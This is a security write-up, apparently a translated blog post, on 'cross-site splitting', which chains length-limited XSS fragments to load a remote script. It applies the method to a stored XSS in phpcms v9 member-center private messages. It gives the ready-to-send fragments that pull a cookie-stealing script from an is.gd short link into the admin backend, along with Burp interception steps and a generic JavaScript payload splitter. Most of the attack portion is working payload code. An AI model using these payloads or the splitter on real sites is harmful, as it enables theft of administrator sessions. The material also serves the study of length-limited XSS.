XSS Cross-Site Splitting

Source: Internet
Author: User

0x01: Description

Recently I set up a phpcms v9 site for testing. It is an old version with many known vulnerabilities, and plenty of analyses of it can be found on WooYun. While looking at it I found a stored XSS; I do not know whether someone has reported it before. The following describes how to exploit it.

0x02: Cross-Site Splitting

What is the cross-site splitting method? Let's start with the principle.

Jianxin, a well-known security researcher, once published an article called Crazy cross-site trip that describes a special XSS exploitation technique: how to use the "splitting method" to execute cross-site script when the application does not filter the key XSS characters (such as < and >) but limits the length of the input.

Jianxin had found an XSS vulnerability in the contact-information field of a website's comments. The field accepted only 30 characters, and the wrapper <script></script> alone takes 17 of them, leaving just 13 for the actual code, so on its own the XSS could do little more than pop up a dialog box. Fortunately, comments on that site could be posted repeatedly, that is, several script tags could be submitted one after another, so Jianxin built the following exploit:

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

The purpose of the code above is to introduce a string variable z and split the following code into it:

document.write("<script src=http://www.shell.net/1.js></script>")

Each fragment appends a few characters to z, and the last fragment runs the assembled string with eval(z). Note that the closing </script> of the injected tag is itself split across two fragments ('js></sc' and 'ript>")'), because a literal </script> inside a script block would end that block prematurely. The core of the cross-site splitting method, then, is to divide the cross-site code into several fragments and splice them back together for execution in some way, much like staging shellcode in a buffer-overflow exploit.
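As an added example (not code from the original article or from Jianxin's post), the following JavaScript implements the splitting step generically: given a payload and a per-fragment length limit, it produces <script> fragments that rebuild the payload in a global variable and eval() it, keeps every fragment within the limit, avoids placing a literal </script inside any fragment, and checks that the pieces reassemble. The function names splitPayload and reassemble, the variable name z and the 30-character limit are assumptions; with Jianxin's payload and a 30-character limit it reproduces his ten fragments.

```javascript
// Added example, not code from the original article or from Jianxin's post.
// Generic splitter for the technique above: given a payload that does not fit
// a length-limited injection point, emit <script> fragments, each at most
// `limit` characters including the tags, that rebuild the payload in a global
// string and finally eval() it. splitPayload/reassemble, the variable name z
// and the 30-character limit used below are assumptions for this example.

const OPEN = '<script>';
const CLOSE = '</script>';

// Escape a chunk so it is safe inside a single-quoted JS string literal.
function jsQuote(s) {
  return s.replace(/\\/g, '\\\\').replace(/'/g, "\\'");
}

function splitPayload(payload, limit, v = 'z') {
  const frags = [];
  let i = 0;
  while (i < payload.length) {
    // the first fragment seeds the variable (z='...'), later ones append (z=z+'...')
    const prefix = i === 0 ? `${v}=` : `${v}=${v}+`;
    const room = limit - OPEN.length - CLOSE.length - prefix.length - 2; // 2 for the quotes
    if (room < 1) throw new Error('limit too small for this fragment layout');
    let n = Math.min(room, payload.length - i);
    let body;
    for (;;) {
      body = `${prefix}'${jsQuote(payload.slice(i, i + n))}'`;
      const fits = OPEN.length + body.length + CLOSE.length <= limit;
      // shrink the chunk until the escaped literal fits and the fragment does not
      // contain '</script', which would make the HTML parser close the tag early
      if ((fits && !/<\/script/i.test(body)) || n === 1) break;
      n--;
    }
    if (OPEN.length + body.length + CLOSE.length > limit) {
      throw new Error('a single escaped character does not fit the limit');
    }
    frags.push(OPEN + body + CLOSE);
    i += n;
  }
  frags.push(`${OPEN}eval(${v})${CLOSE}`);
  return frags;
}

// Recover the payload the way the browser will: take the string literal out of
// each fragment in order and concatenate. Used here to check the round trip.
function reassemble(frags, v = 'z') {
  const lit = new RegExp(`^${OPEN}${v}=(?:${v}\\+)?'([\\s\\S]*)'${CLOSE}$`);
  let acc = '';
  for (const f of frags) {
    const m = lit.exec(f);
    if (m) acc += m[1].replace(/\\(.)/g, '$1');
  }
  return acc;
}

// Jianxin's target from the text, split under the 30-character limit.
const demo = splitPayload('document.write("<script src=http://www.shell.net/1.js></script>")', 30);
console.log(demo.join('\n'));
```

The 30-character case gives a 9-character seed ('document.') and 7-character appends, which is exactly the layout of Jianxin's fragments. A payload containing <!-- would need the same kind of care as </script, because it puts the HTML tokenizer into the escaped script-data state.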

0x03: vulnerability Exploitation

Now let's apply the splitting method to this vulnerability. The XSS lies in the short messages (private messages) of the member center.

First, write and send a short message normally. Intercept the request with Burp Suite and insert JS code into the recipient field:

<script>alert(/xss/)</script>

Viewing the short message in the admin backend triggers the JS.

However, it is not easy to insert JS that steals the cookie, because the database limits the length of the recipient name: only strings of at most 30 characters can be stored per message. So let's try the cross-site splitting method.

First, let's be clear about the goal: we want the following JavaScript to end up in the website backend and run there (the is.gd link is a shortened URL pointing at the script that collects the cookie):

z='document.write("<script src=http://is.gd/2p1PJ9></script>")'
eval(z)

Then we split it into ten parts, each within the 30-character limit:

<script>z='document'</script>
<script>z=z+'.write('</script>
<script>z=z+'"<scrip'</script>
<script>z=z+'t src=h'</script>
<script>z=z+'ttp://i'</script>
<script>z=z+'s.gd/2p'</script>
<script>z=z+'1PJ9></'</script>
<script>z=z+'script>'</script>
<script>z=z+'")'</script>
<script>eval(z)</script>
  

Send ten short messages, inserting one fragment per message into the recipient field, so that all ten end up in the website backend in order. The + must be URL-encoded as %2B in the request body, otherwise the server decodes it as a space and the concatenation breaks. Let's look at the effect.

The recipient column contains the JS we inserted, so nothing is displayed there. Let's look at the page source.

The red-underlined lines are the JS we inserted; the browser executes the ten pieces in order, and the cookie is finally obtained:
